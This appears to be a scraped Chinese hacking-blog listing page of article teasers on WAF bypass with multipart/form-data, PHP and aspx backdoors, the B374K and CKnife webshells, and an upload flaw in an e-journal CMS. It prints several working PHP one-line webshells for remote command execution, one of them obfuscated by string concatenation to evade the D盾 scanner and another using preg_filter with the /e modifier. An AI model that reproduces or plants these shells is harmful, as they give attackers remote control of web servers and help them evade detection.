multipart/form-data PHP和Java通用的WAF绕过方法

依旧是multipart/form-data,去年的时候说道了利用PHP的特性去绕过WAF.轻松绕各种WAF的POST注入、跨站防御(比如安全狗)
原文简单的描述了PHP在处理POST请求的时候会解析multipart/form-data的内容。
那么这个multipart/form-data到底是个啥呢?

综合一句话破解工具

综合一句话爆破


B374K源自国外的强大PHP WEBSHELL

B374K PHP WEBSHELL

PHP绕过各种waf技巧-CVE-2015-4024

今天我们想从2015.04.03的一个PHP远程dos漏洞(CVE-2015-4024)说起。技术细节见如下链接,中文版:http://drops.wooyun.org/papers/6077,英文版 :https://bugs.php.net/bug.php?id=69364。因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS。事实上该漏洞还有其他非dos的利用价值,其中之一,就是绕过当前各种云WAF的文件上传防御策略。

最短php一句话

最短php一句话

<?=`$_GET[1]`;


aspx 反射后门

首先将test.aspx上传支持aspx的网站

http://www.xxx.com/test.aspx

打开后显示

会显示网站应用的根路径


Windows、Linux后门合集解析

CKnife java版本的中国菜刀 可过各种waf狗

CKnife java版本菜刀

万众电子期刊在线阅读系统后台上传漏洞

再次拿到了万众电子期刊在线阅读系统。搭建测试,修复了前台的SQL注入以及XSS跨站。有留言的地方增加了验证码.
后台查看上传的过程admin\includes\upload.inc.php

<?php
header('content-Type:text/html;charset=UTF-8');
require '../../includes/other.fun.php';
require '../../includes/file.fun.php';
$input=$_GET['input'];
$form=$_GET['form'];
$dir=$_GET['dir'];//目录
$text=$_GET['text'];
$type=$_GET['type'];
?>

D盾的软肋 最新过D盾一句话

<?php $str_tmp = "eval"; $str_tmp .= "(";$str_tmp .= "$";$str_tmp .= "_PO";$str_tmp .= "ST[1]);";@eval($str_tmp); ?>

今日要分享的一句话:

<?php $ad = '|';$ad .='.';$ad .='*|';$ad .='e';@preg_filter('|.*|e', $_REQUEST['1'], ''); ?>